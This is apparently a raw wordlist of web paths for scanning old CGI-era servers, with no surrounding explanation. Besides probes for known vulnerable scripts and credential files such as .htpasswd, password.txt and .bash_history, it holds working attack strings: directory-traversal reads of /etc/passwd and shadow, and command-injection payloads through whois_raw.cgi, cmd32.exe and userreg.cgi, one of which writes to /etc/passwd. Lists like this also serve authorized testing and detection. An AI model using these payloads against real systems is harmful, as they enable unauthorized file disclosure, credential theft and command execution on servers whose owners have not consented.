/.pl
/....../etc/hosts
/../../../../etc/hosts
/.access
/.bash_history
/.htaccess
/.htpasswd
/.passwd
/~bin
/~ftp
/~guest
/~log
/~logs
/~lp
/~named
/~root
/~test
/~tmp
/bb-dnbd/bb-hist.sh
/bin
/bin/jscripts/GneteFuncs.js
/ccbill/secure/ccbill.log
/cgi-bin/add_ftp.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin/ads.setup
/cgi-bin/aglimpse
/Cgi-Bin/aglimpse.cgi
/cgi-bin/aglimpse.cgi
/Cgi-Bin/alibaba.pl
/cgi-bin/alibaba.pl
/cgi-bin/alibaba.pl\dir
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/AnyBoard.cgi
/cgi-bin/anyboard.cgi
/cgi-bin/AnyForm
/cgi-bin/AnyForm.cgi
/cgi-bin/AnyForm2
/cgi-bin/archie
/cgi-bin/architext_query.pl
/cgi-bin/ash
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/authorize/dbmfiles/users
/cgi-bin/ax.cgi
/cgi-bin/ax-admin.cgi
/cgi-bin/axs.cgi
/cgi-bin/bash
/cgi-bin/bb-hist.sh
/cgi-bin/bigconf.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calendar
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/Cgi-Bin/campas
/cgi-bin/campas
/cgi-bin/carbo.dll
/cgi-bin/cart.pl
/cgi-bin/ceilidh.exe/ceilidh/?N4
/cgi-bin/cgimail.exe
/Cgi-Bin/cgitest.exe
/cgi-bin/Cgitest.exe
/cgi-bin/cgiwrap
/cgi-bin/classified.cgi
/cgi-bin/classifieds
/cgi-bin/classifieds.cgi
/cgi-bin/clickresponder.pl
/Cgi-Bin/cmd.exe
/cgi-bin/cmd.exe
/Cgi-Bin/cmd32.exe
/Cgi-Bin/cmd32.exe?/c+dir
/cgi-bin/Count.cgi
/Cgi-Bin/count.cgi
/cgi-bin/counterfiglet
/Cgi-Bin/csh
/cgi-bin/csh
/cgi-bin/date
/cgi-bin/day5datacopier.cgi
/cgi-bin/day5datanotifier.cgi
/cgi-bin/day5notifier
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/download.cgi
/cgi-bin/dumpenv.pl
/Cgi-Bin/echo.bat
/cgi-bin/edit.pl
/Cgi-Bin/enivron.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/Cgi-Bin/ezshopper/loadpage.cgi
/Cgi-Bin/ezshopper/search.cgi
/cgi-bin/faxsurvey
/Cgi-Bin/faxsurvey
/cgi-bin/filemail
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.cgi
/cgi-bin/finger.pl
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/Cgi-Bin/FormHandler.cgi
/cgi-bin/FormHandler.cgi
/Cgi-Bin/formmail
/Cgi-Bin/formmail.cgi
/Cgi-Bin/formmail.pl
/cgi-bin/formmail.pl
/cgi-bin/fortune
/cgi-bin/ftp/ftp.pl
/cgi-bin/gH.cgi
/cgi-bin/glimpse
/cgi-bin/guestbook
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/htmlscript
/cgi-bin/htmlscript?../../../../etc/passwd
/Cgi-Bin/htsearch
/cgi-bin/htsearch
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/Cgi-Bin/jj
/cgi-bin/jj
/cgi-bin/k
/Cgi-Bin/ksh
/cgi-bin/ksh
/Cgi-Bin/loadpage.cgi
/cgi-bin/loadpage.cgi
/cgi-bin/lwgate
/cgi-bin/LWGate.cgi
/cgi-bin/lwgate.cgi
/cgi-bin/MachineInfo
/cgi-bin/mail
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/mlog.phtml
/cgi-bin/mylog.phtml
/cgi-bin/netstat
/cgi-bin/nlog-smb.pl
/cgi-bin/nph-error.pl
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/Cgi-Bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.dat
/cgi-bin/password.log
/cgi-bin/password.txt
/cgi-bin/perl
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/Cgi-Bin/phf
/cgi-bin/phf
/cgi-bin/phf.cgi
/cgi-bin/phf.pp
/cgi-bin/photo_cfg.pl
/cgi-bin/php
/cgi-bin/php.cgi
/cgi-bin/phpscan
/cgi-bin/plusmail
/cgi-bin/postcard.pl
/cgi-bin/post-query
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/redirect
/cgi-bin/responder
/cgi-bin/responder.cgi
/cgi-bin/rksh
/cgi-bin/rpm_query
/cgi-bin/rsh
/cgi-bin/rwwwshell.pl
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/Cgi-Bin/search.cgi
/cgi-bin/search.cgi
/cgi-bin/sendform.cgi
/cgi-bin/settings.cfg
/Cgi-Bin/sh
/cgi-bin/sh
/cgi-bin/shop.cgi
/cgi-bin/shop.cgi?page=../../../../etc/passwd 
/cgi-bin/sojourn
/Cgi-Bin/sojourn.cgi
/cgi-bin/status.cgi
/cgi-bin/survey
/cgi-bin/survey.cgi
/Cgi-Bin/tcsh
/cgi-bin/tcsh
/Cgi-Bin/test.cgi
/Cgi-Bin/testcgi
/cgi-bin/test-cgi
/cgi-bin/test-cgi.tcl
/Cgi-Bin/test-cgi/*
/cgi-bin/test-cgi?*
/cgi-bin/test-env
/cgi-bin/textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/UltraBoard.cgi
/cgi-bin/UltraBoard.pl
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/upload.pl
/cgi-bin/uptime
/cgi-bin/user.dat
/cgi-bin/user.log
/cgi-bin/userfile.dat
/cgi-bin/view-source
/Cgi-Bin/view-source
/cgi-bin/w3-msql
/cgi-bin/w3-msql/
/cgi-bin/w3-sql
/cgi-bin/w3tvars.pm
/cgi-bin/wais.pl
/cgi-bin/webbbs.cgi
/cgi-bin/webdist.cgi
/Cgi-Bin/webdist.cgi
/cgi-bin/webgais
/cgi-bin/webmap.cgi
/cgi-bin/webplus
/cgi-bin/websendmail
/cgi-bin/webwho.pl
/cgi-bin/whois_raw.cgi
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/cgi-Bin/wrap
/cgi-bin/wrap
/cgi-bin/wrap.cgi
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/zsh
/cgi-local
/cgi-src
/cgi-src/phf.c
/cool-logs/mlog.html
/cool-logs/mylog.html
/database.nsf
/domcfg.nsf
/domcfg.nsf/
/domcfg.nsf/?open
/domlog.nsf
/domlog.nsf/
/ews/ews/architext_query.pl
/font9.css
/log
/log.nsf
/log.nsf/
/logs
/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
/mall_log_files/order.log
/manage/cgi/cgiproc
/names.nsf
/names.nsf/Open
/navigate/ews/ews/architext_query.pl
/ncl_items.html
/null.htw
/order/order.log
/orders/checks.txt
/orders/import.txt
/orders/mountain.cfg
/Orders/order.log
/orders/order.log
/orders/orders.txt
/ows-bin/perlidlc.bat
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/pfdispaly.cgi
/photoads/ads_data.pl
/photoads/cgi-bin/env.cgi
/ping
/piranha/secure/passwd.php3
/prxdocs/misc/prxrch.idq
/PSUser/PSCOErrPage.htm
/publisher/
/pw/storemgr.pw
/quikstore.cfg
/root
/userreg.cgi?cmd=insert</=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
/usr/local/apache/share/htdocs/.htaccess
/web_store.cgi
/WebSTAR
/whois_raw.cgi
/publisher               
/admin-serv/config/admpw 
/cgi/
/cgi-bin/
/../../shadow
/../../passwd
/../../../etc/passwd
/../../../../etc/passwd
/../../../../../etc/passwd
/../../etc/passwd
/ifx/?LO=../../../etc/passwd